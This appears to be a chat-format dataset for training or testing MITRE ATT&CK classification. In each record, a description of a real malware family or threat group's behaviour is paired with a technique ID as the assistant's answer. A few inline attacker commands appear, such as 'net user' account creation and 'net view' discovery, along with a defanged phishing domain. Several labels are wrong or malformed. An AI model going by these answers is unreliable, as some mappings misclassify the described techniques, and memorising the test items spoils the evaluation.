- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VERMIN can get a list of the processes and running tasks on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group’s arsenal at that point included multiple Trojans and tools for Windows and macOS. In 2015, the actors started to expand their espionage efforts from PCs to mobile devices using the spyware called MobileOrder, which focused on compromising Android devices. Based on the code similarity, shared infrastructure and victimology, we conclude that the new wave of attacks belongs to the same threat actor and that the group continues to deploy and develop MobileOrder malware until this day. In addition to clear code overlaps, we observed multiple overlaps in the infrastructure between the new samples and the old MobileOrder malware variant, as well as multiple variants of Windows Psylo Trojan previously attributed to Scarlet Mimic, that interact with the same malicious domains as the mobile malware."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BadPatch uses HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay can enumerate processes on a target system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CookieMiner has loaded coinmining software onto systems to mine for Koto cryptocurrency."
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PingPull can encode C2 traffic with Base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EVILNUM can obtain the computer name from the victim's system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Regularly, the service checks if a user is logged, by checking if Explorer is running. Once explorer.exe is running, the service configures the environment and executes the C2 contact module: winprint32.exe"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware uses cmd.exe to execute commands on victims."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NOKKI can collect the username from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P.A.S. Webshell has the ability to copy files on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The string is formatted as “||||||||” ^slp Sets the sleep and jitter values ^exit Exits the Trojan Table 5 Commands available within the C# variant of RogueRobin Using Google Drive for C2 A command that was not available in the original PowerShell variant of RogueRobin but is available with the new C# variant is the x_mode"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CSPY Downloader has been delivered via malicious documents with embedded macros."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While we have not been able to obtain a secondary payload from the Unicorn generated PowerShell script, we believe that this group uses the script to deliver Metasploit’s Meterpreter as a potential payload as well"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti can use \"CreateIoCompletionPort()\", \"PostQueuedCompletionStatus()\", and \"GetQueuedCompletionPort()\" to rapidly encrypt files, excluding those with the extensions of .exe, .dll, and .lnk. It has used a different AES-256 encryption key per file with a bundled RAS-4096 public encryption key that is unique for each victim. Conti can use “Windows Restart Manager” to ensure files are unlocked and open for encryption."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BabyShark has used cmd.exe to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VERMIN saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt ."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception’s malware is modular and the attackers will load plugins based on requirements for each attack. The group has used a range of plugins in recent attacks, some of which are improved versions of plugins used in 2014, while others were previously unseen"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During privilege escalation, freely available tools such as Mimikatz and Ncrack have been observed, in addition to legitimate tools such as Windows Credential Editor and ProcDump"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used tools to take screenshots from victims."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Heyoka Backdoor can use DNS tunneling for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can inject code into multiple processes on infected endpoints."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The SHA256 hash is then base64 encoded, which results in an encoded string of EfZrVfPSQwNiHl75VlsCpXbMWLxfh4nK6Ww9QABkuQ4=, of which the first 24 characters are used as the 3DES key"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "captures screenshots of the victim’s screen."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "dropper creates VBS scripts on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smoke Loader deobfuscates its code."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has given malware the same name as an existing file on the file share server to cause users to unwittingly launch and install the malware on additional systems."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "deletes files using DeleteFileW API call."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If we look historically, BelialDemon has been involved in the development of malware loaders. BelialDemon is considered the primary developer of TriumphLoader, a loader previously posted about on several forums, and has experience with selling this type of malware."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA551 has used rundll32.exe to load malicious DLLs."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RogueRobin has used Google Drive as a Command and Control channel."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has used trojanized Microsoft Word documents sent via email, which prompted the victim to enable macros."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SPACESHIP achieves persistence by creating a shortcut in the current user's Startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot creates processes using the Windows API calls: CreateProcessA() and CreateProcessAsUserA()."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has compressed and encrypted data into password-protected RAR archives prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can upload files to the victim's machine for operations."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanHaiShu modifies the %regrun% Registry to point itself to an autostart mechanism."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to use the open source libraries XZip/Xunzip and zlib to compress files."
- },
- {
- "role": "assistant",
- "content": "T1560.002 - Archive Collected Data: Archive via Library"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldenSpy constantly attempts to download and execute files from the remote C2, including GoldenSpy itself if not found on the system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can record screen content in AVI format."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor by making a connection using a HTTP POST."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "runs its core DLL file using rundll32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elise exfiltrates data using cookie values that are Base64-encoded."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "checks for anti-virus, forensics, and virtualization software."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Further collaboration between FireEye as a Service (FaaS), Mandiant and FireEye iSIGHT intelligence uncovered additional victims worldwide, a new suite of tools and novel techniques"
- },
- {
- "role": "assistant",
- "content": "T1543 - Create or Modify System Process', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Data Exfiltration The second module Irdsnhrxxxfery98.~ is responsible for a vast amount of information stealing, and is able to collect information through hooking, clipboard usage, and monitoring the keystate"
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Change file owner and group. This utility is used by malware to change the user ID and/or the group ID of the specified files. This can lock other users’ out of access to the file, thus hampering removal or inspection. It may also be required in order to execute a file in certain, elevated context"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Invoke-PSImage can be used to embed a PowerShell script within the pixels of a PNG file."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EXOTIC LILY has used contact forms on victim websites to generate phishing e-mails."
- },
- {
- "role": "assistant",
- "content": "T1594 - Search Victim-Owned Websites"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda's custom ORat tool uses a WMI event consumer to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"net user username \\password\" commands in Net can be used to create a local account."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The HTTP mode is the same communication method used in variants of the malware from 2018. Although it uses the non-encrypted HTTP protocol to communicate with the C2 it manually encrypts the contents of the requests to hide data from packet inspection. The malware creates an AES session key and initial value (as detailed in Appendix C) which are base64 encoded, appended to each other with a \\n separator. Once appended, it is further encrypted with a hardcoded RSA public key and base64 encoded again and obfuscated before being sent to the C2 as the body of a POST request"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EKANS removes backups of Volume Shadow Copies to disable any restoration capabilities."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze has delivered components for its ransomware attacks using MSI files, some of which have been executed from the command-line using \"msiexec\"."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "And finally, a mention of Trojan-Downloader.Win32.CWS.j, another common site on malicious websites. This downloader is basically a small stub which downloads and installs variants of CWS, perhaps better known as CoolWebSearch. CoolWebSearch is a malicious program which was first reported circa 2003. Ever since, a huge number of variants have been found in the wild, most of them following the same pattern of hijacking the browser startup page and displaying pornographic pop-ups. Over time, CWS variants have become more and more complex and the latest versions include rootkit stealth components and retro features designed to terminate antivirus programs."
- },
- {
- "role": "assistant",
- "content": "T1176 - Browser Extensions', 'T1014 - Rootkit', 'T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Although MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral movement"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Confucius has dropped malicious files into the startup folder `%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup` on a compromised host in order to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As seen in Figure 7, this .NET executable uses a GitHub repository to obtain and execute a downloader. This repository is now gone, but we were able to download a copy of it while it was still available"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Windows can communicate using custom TCP."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ChChes can encode C2 data with a custom technique that utilizes Base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As you can see in Figure 1, the authentication prompt says “Connecting to <redacted>. 0utl00k[.]net”, which is a DarkHydrus C2 server. If the user enters their credentials in this dialog box and presses ‘Ok’, the credentials are sent to the C2 server via the URL https://<redacted>.0utl00k[.]net/download/template.docx. With the authentication dialog box gone, Word displays the contents of the document, which in this specific case was an empty document. While this document was empty, the authentication prompt may have made the targeted user more likely to enter their credentials, thinking it’s necessary to view the contents of the document. DarkHydrus also created their C2 domain carefully in an attempt to further trick the targeted user to enter their credentials. Also, the 0utl00k[.]net domain resembles Microsoft’s legitimate \"outlook.com” domain that provides free email services, which also make the user less suspicious and more likely to enter their credentials. Some users may not even notice what domain the dialog states they are connecting to and habitually type their Windows credentials. We found two additional Word documents using the 0utl00k[.]net domain to harvest credentials, seen in Table 1. We first saw these related Word documents in September and November 2017, which suggests that DarkHydrus has been carrying out this credential harvesting campaign for almost a year"
- },
- {
- "role": "assistant",
- "content": "T1187 - Forced Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "takes screenshots of the compromised system's desktop and saves them to C:\\system\\screenshot.bmp for exfiltration every 60 minutes."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ServHelper’s payload, an NSIS Installer signed with a valid digital signature (further details on the certificate ahead), is downloaded by msiexec.exe to its temporary folder (C:\\Windows\\Installer\\MSI[4-charachter-string].tmp) and executed"
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, CMD.exe arguments, and PowerShell scripts."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and NetSupport Manager RAT-based malware."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX can use API hashing and modify the names of strings to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TinyTurla can set its configuration parameters in the Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrongPity has been signed with self-signed certificates."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Just like Rampant Kitten, both threat groups attempted to gather information from the Keepass password manager and changed the execution flow of Telegram Desktop to ensure the persistence of their malware"
- },
- {
- "role": "assistant",
- "content": "T1555.005 - Password Managers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
